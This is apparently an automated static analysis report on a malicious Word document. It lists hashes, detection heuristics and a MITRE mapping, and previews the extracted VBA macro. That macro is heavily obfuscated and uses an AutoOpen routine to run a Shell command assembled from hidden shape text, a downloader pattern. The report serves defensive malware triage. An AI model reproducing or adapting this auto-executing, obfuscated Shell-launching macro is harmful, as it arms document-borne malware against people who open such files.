Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c6e5c676fc8b0cd…

MALICIOUS

Office (OLE)

136.6 KB Created: 2018-12-10 15:21:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 6bf1ab7c13f862a219a25d087067e886 SHA-1: a271a8e23700a93ac520dfe18492e3a254e5ac28 SHA-256: 9c6e5c676fc8b0cdbee3678f45cdbcdef1ee7c5f507b119a63bef97e6b99f607
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains a VBA macro with an autoopen subroutine that invokes cmd.exe with obfuscated arguments. This suggests an attempt to download and execute a secondary payload. The presence of a Shell() call and suspicious cmd.exe invocation points to a malicious downloader.

Heuristics 9

  • ClamAV: Doc.Malware.Dldk-6779378-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dldk-6779378-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    . _
Shell(TuVsYWzGVb, mBazcr), jiqpK)
    FznbikbSkGiwYhaFEmIlJw = JThRwjNCcTJEwtXijWNiC / Tan(197755194) * 272893850 / Tan(302319952) + pHZOrJfISiIBTdl - Cos(152461652) + (25668951 / Int(cOddMjDcPvOffd))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
pjbmZm
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5467 bytes
SHA-256: 01abdc3ae30b8c53713174f73c90f89fa625a6d995064acbf4532e1551747706
Detection
ClamAV: No threats found
Obfuscation or payload: likely
142 of 181 identifiers look randomly generated (e.g. 'risziEmwEdpWGcMlVGowvorv') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sCJtiKrzIX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
pjbmZm
End Sub

Attribute VB_Name = "cXQwOdwwjbnIMD"
Function pjbmZm()
On Error Resume Next
    UaOKwSDtNXWcmPinKlhHdR = sRhnkkYbqhXnWbGioDIHcWEr / Tan(189679605) * 38879204 / Tan(121208645) + fvoJDiWtRfTIpw - Cos(210039272) + (306837440 / Int(cHMECtDVJTWMqKiST))
Set vtOjrFNQJkzSfqKczzGAcBkn = KzhbUoqVAkBAtPGrlkSVqnf
NKjMTTtIaphFfp = wJzfFIcGhzIqRRRDWTfOKH
    FLOumcGJRqENCRRXOKVRihw = KciAzNNjHvDawrOw / Tan(155682666) * 206048898 / Tan(89998048) + tBOklbkmYDMXODj - Cos(61838601) + (303240094 / Int(JEcUGGOqbWwXuDT))
Set QJOwOXcbLEifMtIFERVJdZv = WuANpBJJEXmauvs
bAJBYjihOrSdhKNrNHbTXO = JvYboGiKIYjicPujnPSzw
    JuHtsDKsrtXzSzcOsROjFRR = flwdfJzMLMwCECpfqPIWK / Tan(320210200) * 80341525 / Tan(331692690) + wrOdGpsdaNHGhNhtKlFw - Cos(170558094) + (65780704 / Int(biqpIvWjYwAjRljFWGZipi))
Set ICbczKGzDmBmuPAjiDi = IjdQIbjjsAfAtJhmhSXYS
zwPzopWWqbLAQcYKUXiXHCGA = khOCPfFPKjhAJnqMWJEpttF
    kIoNVLnPFkFCnDG = jHnJPtQlEzZHAFGj / Tan(61905209) * 300175983 / Tan(175003799) + DOiUdQGjOlEhzXBwOZtrsCI - Cos(144444533) + (252237224 / Int(OziWttdPJScTjwmjXSvs))
Set cEJUjAjwAFIhwCGE = sKEiOjTutuEMfpauXlvUBJt
QIMTljwjbiaknbOUqZqFfmV = inZQLkriRKRGXzIJw
    CtiKEJCFSfCRTuzaOvvFsbj = CzVqvJsUfAikcOlZIozrWnmH / Tan(11659955) * 168072936 / Tan(27189649) + LbAaKkIEoMKJmimSMPzzJWz - Cos(26988345) + (200581333 / Int(bPMNoVFwJEAIZrGhkvioEoB))
Set vlbEkodwvSJsraYoDo = hREqFtclCZqnmOtSCtB
UaEMGiNpKWqkQPTB = vWKIDaWFfWiwIWuCbEHNrjX
    HjkILwwZfmXhMjCbuZNkoE = HSLwiUlZXTXEIOEmfXDPBca / Tan(260357123) * 5005420 / Tan(32187363) + UzzlwCmdpAzOEuN - Cos(334850) + (98074211 / Int(iuNqmhMlprirYzdOQbZhYB))
Set kOmjJwVncLzWKrdLQZ = NuwzbBkqdlahPcZc
zBCnTECfZbTWmQJHLoa = QLiZIrCBijukPBLOXatqwS
    StOjVJzcYqCaMOKJWEi = XMfoIiNvVEnSPEt / Tan(186443041) * 56803514 / Tan(51823574) + KYlrwjEMcJHAXzLBGNZX - Cos(286734865) + (318102284 / Int(GUCjLIViBOZTim))
Set hIERllNDQTECnOikmO = iXvwsEHbGlzjdPljRS
LQsRmQHFiTSinFLHzlL = MdKGRSnanChRRMCF
    fOlLKzVzzGpCEhtV = vkYLmwUahzcDUqMQXmRApB / Tan(178708063) * 216696216 / Tan(44355982) + lldVjLhdNXowtSRldz - Cos(297872966) + (313384101 / Int(PdlhucUwuJrEPLizLSQW))
Set cocYtwjEXbnLrVIromjMfT = zudHjnSjcYomoJIB
luWhDtYpZFXjhKLJaiiP = zQFuLmCiThflFbkzjuAERJh
Set QTqVRZE = sCJtiKrzIX.Shapes(zqLoWcic + "qjuljvLMNkR" + ABphi).TextFrame
    hPzDGQOVDbiwIF = FabpETukIAJlapKoYXmkA / Tan(29916536) * 7034727 / Tan(20648151) + zaoBHWkIIMmwJpkm - Cos(208508364) + (273558546 / Int(zfojsnFZWVkAZY))
Set FsGiAiYdRcXpPhBzUOwF = LuvOBzNmXMMafksfwpXZ
XDVzqrVXQlaTzt = LUwhKqtQKPjwJRXZbffnrZQL
    VQwKbwiviBqocuthvMb = uQMPLMWYbqbaFqTfTDQl / Tan(187879928) * 67597035 / Tan(218989918) + wfQUGjlEsMjEEhwOaK - Cos(128845655) + (291650313 / Int(PjmbONsvqBkjqRjwBRv))
Set WitJPbmEBKRqovi = dtrSsICKwUNPSSYsXnDhpdMn
nufjtuuikSIZdMOfjNu = WljlZTBsAGAhErFO
    wAkPimDDdRbhRw = jpwHTptwEzfOwa / Tan(163893644) * 29111877 / Tan(11217345) + wjciLqzEvfqjncrzC - Cos(204494982) + (49559982 / Int(HMECfSwYFdEMZPSOb))
Set iHHPuOIVJDWwXtwjKlfaDtra = SadKYJcXEAzKrSqtKIvBGFKQ
EjjAvkQjQcnfKltubTszZS = phslwZsMQNUTdsWJQj
TuVsYWzGVb = QTqVRZE.ContainingRange + znRGG + crpOKd + iGvMF + HalGiq + mcSbl + IAFPzv + RUKEPhE + JPPmSQk + YENvisz + FpzIzdN + vBVWhSmS
    SDoOtQfqBTHiMW = kjWdzMGrmkvILqVoowEzSikr / Tan(37968811) * 274778523 / Tan(208410044) + HrKoohKLrFzsMMBdwHTzffT - Cos(224157839) + (53440172 / Int(dBvfXJjNjuaGTijJwiz))
Set lGjGtwWjNcYcjPDI = LhpLzcGDrnpTWikkw
WUpmZnAzGVwaEaXtkAHAmi = CBKjMquorkcjnaYICLz
    sonuvXqIDwbHVLImrXGOkG = AnoWuQbsBBFrfXwKRwAlwJ / Tan(130654799) * 318940529 / Tan(36883308) + JOrhLDmznGGBvrb - Cos(42667981) + (167758932 / Int(PUdOtNpSjUqqTsQ))
Set HNBUqBEfkrDQAIJskOjkcv = irtTRJwnOkHkOFFPOQ
iBJZRbLzGFLfMMrXcwhmWnEp = tYumiwSUiQTUScsFLphC
    ItNcwfTzrwPsahUYBtG = bIUdUCDlOwsKkvijkYZ / Tan(163408844) * 225888682 / Tan(211396052) + univREjovunzAZkHwciktEF - Cos(52193143) + (206182777 / Int(ondThrvOZpmGlj))
Set KwQwvdGAQdwzvApiaPNQs = bMvEmzuUprBCjHoL
ahmMqlrzOkGMqXQpzVEAq = GGvnFwsQitPjniGzkbDFXPn
Const mBazcr = 0
    NaLojEihBHNGPkOdNuh = QGEsWfaJVCimoudrcBB / Tan(56101338) * 3696776 / Tan(340086287) + BrhpWLDTAcVJHWSREdUMwZa - Cos(121351399) + (138964236 / Int(WAMtYbQMCBpqDwR))
Set hKSkVVJjwifnvbQOUPpCH = EusvTRcOaWuPrQA
lArdwuvdQakaWoJPcaGYs = BsHiDJsjkAOjdoLdKJw
    NIzTMiuCvpFcsbpBOBOPql = WZqXrXuYusiqpScNz / Tan(8071505) * 41931194 / Tan(110243293) + loDmDRbldCzbsauVG - Cos(20495157) + (200586655 / Int(QKkNkzjloPOjUz))
Set kmlnGSnRpfOzrhsswbPza = pBEiqzOoPHtpKjV
YjdtuiVBsDwWQIFAL = zjjYcqCAQHEBXJXiDjVj
fCpmB = Array(YHBtifllf, GmquROzqj, whEZiiVp, Interaction _
. _
Shell(TuVsYWzGVb, mBazcr), jiqpK)
    FznbikbSkGiwYhaFEmIlJw = JThRwjNCcTJEwtXijWNiC / Tan(197755194) * 272893850 / Tan(302319952) + pHZOrJfISiIBTdl - Cos(152461652) + (25668951 / Int(cOddMjDcPvOffd))
Set KIZnokKiviPPhMscKwcMfd = vtKOuktnziOIUMjP
SkhzwRVPWTDjCRHhz = udWQuCrPlTEYPbiKuvvM
    sFQERumnZMNHEqtqm = WzYJMTWNIpjwWq / Tan(12220826) * 185269109 / Tan(199253618) + VjOYCjSQwdPhTlO - Cos(196934794) + (101243300 / Int(risziEmwEdpWGcMlVGowvorv))
Set tzaVzhsbDkvOYzKlFf = acXnVhQIpQCDrzcpGMbGvz
CrQXzIiNqJCUrVJEojZDKAj = RvIDZiYtdhUvFKT
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.